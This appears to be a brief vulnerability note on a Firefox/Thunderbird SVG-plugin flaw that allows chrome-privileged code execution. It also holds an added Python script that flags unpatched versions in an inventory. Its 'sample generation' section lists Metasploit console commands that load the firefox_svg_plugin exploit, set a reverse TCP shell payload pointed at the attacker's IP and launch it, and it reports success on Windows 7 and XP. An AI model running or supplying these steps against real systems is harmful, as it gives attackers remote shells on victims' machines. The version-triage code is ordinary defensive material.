1. Vulnerability description:
Mozilla Firefox before 18.0, Firefox ESR 10.x before 10.0.12 and 17.x before 17.0.2, Thunderbird before 17.0.2, Thunderbird ESR 10.x before 10.0.12 and 17.x before 17.0.2, and SeaMonkey before 2.15 allow remote attackers to execute arbitrary JavaScript code with chrome privileges by leveraging improper interaction between plugin objects and SVG elements.
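The affected-version ranges quoted above, turned into a patch-triage check over a software inventory. This is an added example, not part of the original post or of Metasploit; the `esr` suffix on version strings, the function names and the sample hosts are assumptions constructed for illustration.

```python
import re

# First fixed version per product, from the advisory text above.
# "esr" maps an ESR branch (major version) to its first fixed build.
FIXED = {
    "firefox":     {"release": (18, 0, 0), "esr": {10: (10, 0, 12), 17: (17, 0, 2)}},
    "thunderbird": {"release": (17, 0, 2), "esr": {10: (10, 0, 12), 17: (17, 0, 2)}},
    "seamonkey":   {"release": (2, 15, 0), "esr": {}},
}

def parse_version(text):
    """Return ((major, minor, patch), is_esr) for strings like '17.0.1esr'."""
    m = re.fullmatch(r"\s*(\d+(?:\.\d+){0,2})\s*(esr)?\s*", text, re.IGNORECASE)
    if not m:
        raise ValueError(f"unrecognised version string: {text!r}")
    parts = [int(p) for p in m.group(1).split(".")]
    parts += [0] * (3 - len(parts))
    return tuple(parts), m.group(2) is not None

def is_affected(product, version_text):
    """True if the build predates the fix listed in the advisory."""
    entry = FIXED.get(product.strip().lower())
    if entry is None:
        return False  # product not named in the advisory
    version, is_esr = parse_version(version_text)
    if is_esr and version[0] in entry["esr"]:
        return version < entry["esr"][version[0]]
    # Assumption: ESR branches the advisory does not list are judged
    # against the regular release threshold.
    return version < entry["release"]

def triage(inventory):
    """Return the (host, product, version) rows that still need patching."""
    return [row for row in inventory if is_affected(row[1], row[2])]

# Constructed inventory rows (host, product, version); not real hosts.
SAMPLE_INVENTORY = [
    ("ws-01", "Firefox", "17.0.1"),
    ("ws-02", "Firefox", "17.0.2esr"),
    ("ws-03", "Firefox", "10.0.11esr"),
    ("ws-04", "Thunderbird", "17.0.2"),
    ("ws-05", "SeaMonkey", "2.14.1"),
    ("ws-06", "Firefox", "18.0"),
]

if __name__ == "__main__":
    for host, product, version in triage(SAMPLE_INVENTORY):
        print(f"{host}: {product} {version} is in the affected range")
```

If the inventory source drops the ESR marker, a patched ESR build such as 17.0.2 is compared against the 18.0 release threshold and flagged, so it errs toward over-reporting.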
2. Sample generation:
http://www.metasploit.org/modules/exploit/multi/browser/firefox_svg_plugin
msf > use exploit/multi/browser/firefox_svg_plugin
msf exploit(firefox_svg_plugin) > show payloads
msf exploit(firefox_svg_plugin) > set PAYLOAD generic/shell_reverse_tcp
msf exploit(firefox_svg_plugin) > set LHOST [MY IP ADDRESS]
msf exploit(firefox_svg_plugin) > exploit
3. Test environment
Tested successfully on both Windows 7 and XP; this vulnerability does not need shellcode.